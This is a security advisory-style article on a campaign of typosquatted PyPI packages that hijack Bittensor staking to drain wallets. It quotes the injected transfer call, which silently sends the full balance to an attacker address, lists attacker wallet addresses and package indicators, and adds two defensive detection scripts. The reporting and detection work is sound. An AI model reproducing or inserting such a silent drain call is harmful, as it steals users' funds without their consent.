GitLab’s Vulnerability Research team has uncovered a sophisticated cryptocurrency theft campaign that exploited typosquatted Python packages on PyPI to steal funds from Bittensor ecosystem users.
The attack, discovered through automated package monitoring, targeted one of the most routine and trusted operations in the ecosystem: staking.
Malicious Code Hijacks Staking Operations
The attackers published five malicious packages within a 25-minute window on August 6, 2025, including [email protected], [email protected], and [email protected].
These packages mimicked legitimate Bittensor components through strategic typosquatting, exploiting common typing errors like missing characters (“bitensor” instead of “bittensor”) and truncated names (“bittenso” for “bittensor”).
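The two typo classes named above (a dropped character and a truncated name) are mechanical, so they can be caught before `pip install` runs. The following is an added example, not code from GitLab or the Bittensor project: it normalizes names the way PyPI does (PEP 503), measures edit distance against an allowlist of the packages a project actually depends on, and refuses requirement lines that are one slip away from a legitimate name. The allowlist and the sample requirements file are constructed for the example; in practice the allowlist comes from your lockfile.

```python
import re

# Allowlist of the Bittensor packages a project legitimately depends on.
# Constructed for this example; in practice derive it from your lockfile.
LEGIT_PACKAGES = ["bittensor", "bittensor-cli", "bittensor-wallet"]


def normalize(name):
    """PEP 503 name normalization: lowercase, runs of '-', '_', '.' become '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def osa_distance(a, b):
    """Optimal string alignment distance: one point per insertion, deletion,
    substitution or adjacent transposition (the usual keyboard slips)."""
    prev2 = None
    prev = list(range(len(b) + 1))
    for i in range(1, len(a) + 1):
        cur = [i] + [0] * len(b)
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            cur[j] = min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                cur[j] = min(cur[j], prev2[j - 2] + 1)
        prev2, prev = prev, cur
    return prev[len(b)]


def typosquat_target(candidate, legit=LEGIT_PACKAGES, max_distance=1):
    """Return the allowlisted name that `candidate` most likely impersonates,
    or None. An exact normalized match is legitimate. Otherwise a name within
    `max_distance` edits of an allowlisted name (covers "bitensor"), or a
    truncation of one by up to three characters (covers "bittenso"), is flagged."""
    cand = normalize(candidate)
    by_norm = {normalize(n): n for n in legit}
    if cand in by_norm:
        return None
    best, best_d = None, None
    for norm_name, original in by_norm.items():
        d = osa_distance(cand, norm_name)
        truncated = norm_name.startswith(cand) and len(norm_name) - len(cand) <= 3
        if (d <= max_distance or truncated) and (best_d is None or d < best_d):
            best, best_d = original, d
    return best


# Leading project name of a requirement specifier such as "bitensor==9.9.4".
_REQ_NAME = re.compile(r"^([A-Za-z0-9](?:[A-Za-z0-9._-]*[A-Za-z0-9])?)")


def check_requirements(lines, legit=LEGIT_PACKAGES):
    """Scan requirement lines; return [(requested_name, suspected_target), ...]
    for every name that looks like a typo of an allowlisted package."""
    flagged = []
    for raw in lines:
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("-"):
            continue  # blank, comment, or a pip option such as -r / --index-url
        m = _REQ_NAME.match(line)
        if m is None:
            continue
        target = typosquat_target(m.group(1), legit)
        if target is not None:
            flagged.append((m.group(1), target))
    return flagged


if __name__ == "__main__":
    # Constructed requirements file containing two of the typos named above.
    sample = ["bitensor==9.9.4", "bittensor-cli>=9.0", "bittenso", "requests", "-r base.txt"]
    for requested, target in check_requirements(sample):
        print(f"REFUSING {requested!r}: looks like a typo of {target!r}")
```

Run it as a pre-install gate in CI (fail the job if `check_requirements` returns anything). The edit-distance threshold of 1 is deliberately tight: the goal is to catch the slips the attackers registered, not to block every package with a similar name, and a human reviews anything flagged.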
The attack's technical sophistication lies in a surgical modification of the stake_extrinsic function in bittensor_cli/src/commands/stake/add.py. At line 275, where a user expects the normal staking call, the injected code silently drains the wallet:
```python
# Injected into stake_extrinsic(): reuses the CLI's own transfer routine
result = await transfer_extrinsic(
    subtensor=subtensor,
    wallet=wallet,                                                    # the wallet the user just supplied to stake with
    destination="5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR",  # attacker-controlled address
    amount=amount,
    transfer_all=True,   # send the entire balance, not just `amount`
    prompt=False         # no confirmation shown to the user
)
```
This injection bypasses user confirmation (prompt=False), takes every available token (transfer_all=True), and routes it to the attacker's hard-coded wallet address. Because the call sits inside the staking flow, it signs with the same wallet the user has just supplied for a legitimate operation, so no extra credential or prompt is needed. The user believes they are staking and earning rewards while the wallet is being emptied.
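A hard-coded destination address in a transfer call is the indicator a defender can search for: legitimate CLI code takes the destination from the user. The following is an added example, not code from GitLab or the Bittensor project. It parses Python source with the standard `ast` module, finds every call to `transfer_extrinsic` (by name; the module path it is imported from does not matter), and reports calls whose `destination` is a string literal along with the `transfer_all` and `prompt` settings. The sample source it runs on is constructed for the example and models the injected call quoted above; `scan_tree` is the hypothetical wrapper you would point at an installed package directory.

```python
import ast
import pathlib
from typing import NamedTuple, Optional


class Finding(NamedTuple):
    lineno: int
    destination: str
    transfer_all: bool
    prompt: Optional[bool]  # None when the call does not pass prompt=


def _call_name(func):
    """Last component of the called name: f(), mod.f(), pkg.mod.f()."""
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return ""


def _const(kwargs, key):
    """Value of keyword `key` if it is a literal constant, else None."""
    node = kwargs.get(key)
    return node.value if isinstance(node, ast.Constant) else None


def find_drain_calls(source, target_funcs=("transfer_extrinsic",)):
    """Return a Finding for every call to a transfer routine whose
    destination is a string literal (an address baked into the code)."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call) or _call_name(node.func) not in target_funcs:
            continue
        kwargs = {kw.arg: kw.value for kw in node.keywords if kw.arg}
        dest = _const(kwargs, "destination")
        if not isinstance(dest, str):
            continue  # destination comes from a variable or argument: expected
        findings.append(Finding(
            lineno=node.lineno,
            destination=dest,
            transfer_all=_const(kwargs, "transfer_all") is True,
            prompt=_const(kwargs, "prompt"),
        ))
    return findings


def scan_tree(root):
    """Run find_drain_calls over every .py file under root, e.g. the
    installed bittensor_cli directory. Returns {path: [Finding, ...]}."""
    results = {}
    for path in pathlib.Path(root).rglob("*.py"):
        try:
            hits = find_drain_calls(path.read_text(encoding="utf-8"))
        except (SyntaxError, UnicodeDecodeError):
            continue
        if hits:
            results[str(path)] = hits
    return results


# Constructed sample: a staking function with the injected drain, plus a
# benign transfer whose destination is user supplied.
SAMPLE_SOURCE = '''\
async def stake_extrinsic(subtensor, wallet, amount, hotkey):
    # constructed stand-in for the legitimate staking path
    ok = await subtensor.add_stake(wallet=wallet, hotkey=hotkey, amount=amount)
    # injected drain, modelled on the call reported in the malicious packages
    result = await transfer_extrinsic(
        subtensor=subtensor,
        wallet=wallet,
        destination="5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR",
        amount=amount,
        transfer_all=True,
        prompt=False,
    )
    return ok


async def send(subtensor, wallet, dest, amount):
    # benign: destination comes from the user and a confirmation is shown
    return await transfer_extrinsic(
        subtensor=subtensor, wallet=wallet, destination=dest,
        amount=amount, prompt=True,
    )
'''


if __name__ == "__main__":
    for hit in find_drain_calls(SAMPLE_SOURCE):
        print(f"line {hit.lineno}: hard-coded destination {hit.destination} "
              f"transfer_all={hit.transfer_all} prompt={hit.prompt}")
```

Run `scan_tree` against the package as installed (the files under site-packages), not against a checkout of the upstream repository: the point is to inspect what `pip` actually put on disk. The stronger check is a byte-for-byte diff of the installed files against the artifact downloaded from PyPI for the exact version you intended to install; this AST scan is the cheap triage step when that is impractical.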
Complex Money Laundering Network Traced
GitLab researchers tracked the stolen cryptocurrency through a multi-hop laundering scheme. Funds first collected at the primary wallet 5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR, the address hard-coded in the injected call, were rapidly distributed through intermediate wallets including 5HpsyxZKvCvLEdLTkWRM4d7nHPnXcbm4ayAsJoaVVW2TLVP1 and 5GiqMKy1kAXN6j9kCuog59VjoJXUL2GnVSsmCRyHkggvhqNC, then consolidated at 5D6BH6ai79EVN51orsf9LG3k1HXxoEhPaZGeKBT5oDwnd2Bu before reaching the cash-out endpoint 5HDo9i9XynX44DFjeoabFqPF3XXmFCkJASC7FxWpbqv6D7QQ.
The timing suggests careful coordination: all of the malicious packages were published within minutes of each other, maximizing the window for installs before detection and takedown.
By targeting the staking path specifically, the attackers piggybacked on an operation for which the user has already loaded and authorized their wallet, and on the habit of treating staking as routine; there was no unusual prompt or extra step to arouse suspicion.
This incident underscores the critical importance of supply chain security in cryptocurrency ecosystems, where a single typo during package installation can result in complete financial loss.
GitLab’s swift detection and analysis demonstrate the value of proactive monitoring systems in protecting the broader development community from sophisticated threats.
Indicators of compromise
| IOC | Description |
|---|---|
| pkg:pypi/[email protected] | Malicious PyPI package |
| pkg:pypi/[email protected] | Malicious PyPI package |
| pkg:pypi/[email protected] | Malicious PyPI package |
| pkg:pypi/[email protected] | Malicious PyPI package |